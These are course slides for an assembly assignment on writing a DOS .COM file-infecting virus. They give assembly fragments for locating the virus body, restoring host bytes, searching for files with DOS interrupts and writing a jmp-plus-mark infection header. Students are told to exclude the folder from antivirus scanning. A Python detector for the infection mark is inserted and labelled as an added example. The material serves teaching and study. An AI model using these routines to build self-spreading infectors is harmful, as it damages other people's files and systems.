Assignment 4 Introduction
Assembly TA Wei-Yen Day
Computer Virus Basics
• A program that attaches itself to another program
• Reproduces itself
• Is executed later and creates more copies
– 1.COM -> 2.COM, 3.COM …
• It can certainly dig into your computer and do things you don’t want
Structure of Virus
• 2 basic routines!
– Search
– Copy itself
• Further routines are a bit more complex
– Anti-detection
– Anti-anti-virus
Virus Classification
• According to the types of programs they infect
– They may infect COM, EXE, or SYS files
• Note that a virus can be written to infect any kind of code
– C, BASIC, a batch file, a Paradox or dBase program
COM File Structure
• When one enters the name of a program,
– DOS begins looking for COM, EXE, and BAT
• COM files are much simpler
– They have a predefined segment format
– The format of EXE files is defined by the programmer
– A COM file is a direct binary image of what should be put into memory and executed by the CPU
Assignment 4: Justin Virus
Goal
• Infect all .COM programs under the same folder and print some mischievous lines
Overview
Virus Symbol
• Retain 5 bytes
– 3 bytes for jmp
– 2 bytes for the mark of the virus
• Infect a ?? program when the virus is executed
– nop
– nop
– nop
– nop
– nop
More About Virus
Checking Memory
• Compute the size from the normal program to “here”
• Actual program size
– We call it “si”
– pop si ;si is p1+p2
– sub si, offset here ;then si is p2
• Every memory address inside the virus should have “si” added
Recover Original Program
• Due to the first execution, we should add 5 nops to allocate space (see p.7)
• Recover the original program to memory (P1)
– mov ax, word ptr ds:FIRST_5_BYTE[si]
– mov ds:[100h], ax
– mov ax, word ptr ds:FIRST_5_BYTE[si+2]
– mov ds:[100h+2], ax
– mov al, byte ptr ds:FIRST_5_BYTE[si+4] ;the fifth byte is a single byte, so load it with byte ptr
– mov ds:[100h+4], al
Write Back P1
Print Mischievous Word
• Print some mischievous words
• When the infected file is executed, it prints the words produced by the virus first
• Then infect others
Search Next File(1)
• FIND_FILE
– mov dx,OFFSET COM_MASK ;search for COM files
– mov ah,4EH ;DOS find first file function
– xor cx,cx ;CX holds all file attributes
• FIND_LOOP
– int 21h
– jc FIND_EXIT ;Exit if no files found
– call FILE_OK ;file OK to infect?
– jc FIND_NEXT ;nope, look for another
Search Next File (2)
• FIND_EXIT
– ret ;else return with z set
• FIND_NEXT
– mov ah,4FH ;DOS find next file function
– jmp FIND_LOOP ;Try finding another file
• COM_MASK
– COM_MASK BYTE '*.COM',0
• FILE_OK
– Check whether the virus pattern (the 2-byte mark) already exists in the file
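A defender-side check for the 5-byte header described above (a 3-byte jmp followed by the 2-byte mark that FILE_OK tests), as an added example that is not part of the slides or the assignment code: it scans a folder of .COM files for the mark without executing them. The mark value VIRUS_MARK is an assumed placeholder, since the page never gives the real bytes, and the two sample images are constructed here.

```python
import os
import tempfile

# The slides reserve 5 bytes at the start of an infected COM file: a 3-byte
# near jmp into the virus body followed by a 2-byte mark that FILE_OK tests
# to avoid re-infection. The mark's value is not given on the page, so the
# two bytes below are an assumed placeholder for this example.
VIRUS_MARK = b"JV"
JMP_NEAR = 0xE9          # opcode of the 3-byte "jmp rel16"


def is_infected(image: bytes, mark: bytes = VIRUS_MARK) -> bool:
    """True if a COM image starts with jmp rel16 + mark and the jmp is sane."""
    if len(image) < 5 or image[0] != JMP_NEAR or image[3:5] != mark:
        return False
    rel = int.from_bytes(image[1:3], "little", signed=True)
    target = 3 + rel     # jmp is relative to the byte after the instruction
    return 0 <= target < len(image)   # the jump must land inside the file


def scan_directory(path: str, mark: bytes = VIRUS_MARK) -> list:
    """Names of *.COM files under path that carry the mark; files are only read."""
    hits = []
    for name in sorted(os.listdir(path)):
        if name.upper().endswith(".COM"):
            with open(os.path.join(path, name), "rb") as f:
                if is_infected(f.read(), mark):
                    hits.append(name)
    return hits


# Constructed sample images, not real programs from the assignment archive.
CLEAN_IMAGE = b"\xB4\x4C\xCD\x21"                      # mov ah,4Ch / int 21h
INFECTED_IMAGE = (b"\xE9\x07\x00" + VIRUS_MARK          # jmp +7 over the header
                  + b"\x90" * 5 + CLEAN_IMAGE)          # 5 reserved nops, then exit


def demo_scan() -> list:
    """Write both samples to a temporary folder and report which one is flagged."""
    with tempfile.TemporaryDirectory() as d:
        for name, data in (("A_CLEAN.COM", CLEAN_IMAGE),
                           ("B_INFECTED.COM", INFECTED_IMAGE)):
            with open(os.path.join(d, name), "wb") as f:
                f.write(data)
        return scan_directory(d)


if __name__ == "__main__":
    print(demo_scan())   # ['B_INFECTED.COM']
```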
File OK, Infect It
• Back up the first 5 bytes of the original program
• Copy the virus itself to the program
• Move the pointer to the head, and write the first 5 bytes
– Write v1
– 3 bytes are the jmp
– 2 bytes are the pattern
• Infect the next file
The Infecting Mission is Done!
• Let’s take an overview again:
• 1. Check memory (store the p2 size)
• 2. Recover the original program
• 3. Print lines
• 4. Search for a file to infect
• 5. Infect it
• 6. Loop steps 3 and 4
• 7. If no file can be infected, then the mission is completed
Procedure of Justin
DEMO
Assignment 4 Note
• The .COM files (the files your virus must infect) are here
– http://wyday.csie.ntu.edu.tw/good_com.zip
• When you compile your code to produce a virus, the anti-virus software on your computer might raise an alert
– Try to set your anti-virus software to exclude the folder your virus is in
Checking Scenario
• The following is the judgment of assignment 4:
– If your virus can infect a .COM file (copy itself to attach to another), you get the basic score
– If your virus can infect all .COM files under the same folder, you get a better score
– If your virus can infect all .COM files under the same folder, and when you open an infected file it infects all other files, you get a nice score
• If your virus can do all of the above, and can avoid infecting files repeatedly, you did a good job!
– If your virus crashes my computer, I would …
Now it’s your turn!
• Don’t just copy my code; think about it first
• Actually it’s a simple virus, and it’s easy work
• If you have any problem, google it! XD
• You can also discuss it with me, for sure
• Good luck to you guys!